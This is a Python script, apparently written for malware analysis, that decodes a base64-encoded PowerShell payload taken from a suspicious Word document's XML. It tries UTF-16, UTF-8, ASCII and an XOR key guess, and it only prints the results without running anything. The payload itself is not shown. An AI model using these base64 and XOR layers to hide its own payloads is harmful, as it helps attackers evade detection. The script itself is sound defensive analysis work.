#!/usr/bin/env python3
"""
Decode the PowerShell payload extracted from document.xml
"""
import base64
import re

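print("=" * 70)
print("DECODING POWERSHELL PAYLOAD FROM DOCUMENT.XML")
print("=" * 70)

# Read the saved payload (extracted earlier from document.xml). Only the
# surrounding whitespace is stripped; any embedded newlines are left for
# b64decode() to discard below.
with open('payload.txt', 'r', encoding='utf-8') as f:
    payload = f.read().strip()

print(f"Payload length: {len(payload)} characters")
print(f"First 100 chars: {payload[:100]}")

# This appears to be a PowerShell Base64 encoded command. Decode it and show
# the bytes under the candidate text encodings. The decoded text is only
# printed for inspection; nothing in this script executes it.
try:
    # NOTE: b64decode() without validate=True silently drops characters that
    # are outside the base64 alphabet, so a mis-extracted payload can still
    # "decode" into garbage instead of raising.
    decoded = base64.b64decode(payload)
    print("\n" + "=" * 70)
    print("BASE64 DECODED OUTPUT:")
    print("=" * 70)
    print(f"Decoded length: {len(decoded)} bytes")

    # UTF-16 LE (PowerShell's -EncodedCommand encoding) is a strict decode:
    # an odd byte count or non-UTF-16 content raises UnicodeDecodeError.
    # Report that instead of silently skipping the section.
    try:
        decoded_utf16 = decoded.decode('utf-16-le')
    except UnicodeDecodeError as e:
        print(f"UTF-16 LE decoding failed: {e}")
    else:
        print("UTF-16 LE decoding:")
        print(decoded_utf16[:500])
        if len(decoded_utf16) > 500:
            print("\n[... content continues ...]")

    # UTF-8 / ASCII with errors='ignore' never raise; undecodable bytes are
    # dropped, so these views may be shorter than the raw bytes.
    decoded_utf8 = decoded.decode('utf-8', errors='ignore')
    print("\nUTF-8 decoding:")
    print(decoded_utf8[:500])

    decoded_ascii = decoded.decode('ascii', errors='ignore')
    print("\nASCII decoding:")
    print(decoded_ascii[:500])

except Exception as e:
    # Anything else (e.g. binascii.Error from a non-base64 payload) is
    # reported with a traceback so the analyst sees where decoding broke.
    print(f"Error decoding: {e}")
    import traceback
    traceback.print_exc()

print("\n" + "=" * 70)
print("ALTERNATIVE: Check if payload needs XOR first")
print("=" * 70)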

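def xor_decrypt(text, key):
    """XOR each character of *text* with the repeating *key*.

    The key is cycled character by character (``key[i % len(key)]``), so
    applying the function twice with the same key yields the original text.
    Code points are XORed, so the result may contain non-printable
    characters; it is meant for inspection, not for display as-is.

    Args:
        text: the string to transform.
        key: a non-empty key string.

    Returns:
        The transformed string, the same length as ``text``.

    Raises:
        ValueError: if ``key`` is empty (there is nothing to cycle through).
    """
    if not key:
        raise ValueError("XOR key must not be empty")
    key_len = len(key)
    return ''.join(
        chr(ord(char) ^ ord(key[i % key_len]))
        for i, char in enumerate(text)
    )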

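# Try XOR with the guessed key, then base64 decode
try:
    xor_result = xor_decrypt(payload, "ph15h1n9")
    print(f"After XOR (first 200 chars): {xor_result[:200]}")

    # A wrong key leaves text that is not valid base64 (or not ASCII at all),
    # which b64decode() reports as a ValueError / binascii.Error.
    b64_result = base64.b64decode(xor_result)
    print("\nAfter XOR + Base64 decode:")
    print(b64_result.decode('utf-8', errors='ignore')[:500])

except ValueError as e:
    # Expected outcome for a wrong key guess; report rather than crash.
    print(f"Error: {e}")

# Compare with the payload from decode_payload.py
print("\n" + "=" * 70)
print("COMPARING WITH decode_payload.py PAYLOAD")
print("=" * 70)

original_payload = """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"""

print(f"\ndecode_payload.py payload starts with: {original_payload[:100]}")
print(f"document.xml payload starts with: {payload[:100]}")
# Compare the two strings instead of hard-coding the verdict.
if original_payload == payload:
    print("\nThese are the SAME payload.")
else:
    print("\nThese are DIFFERENT payloads!")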
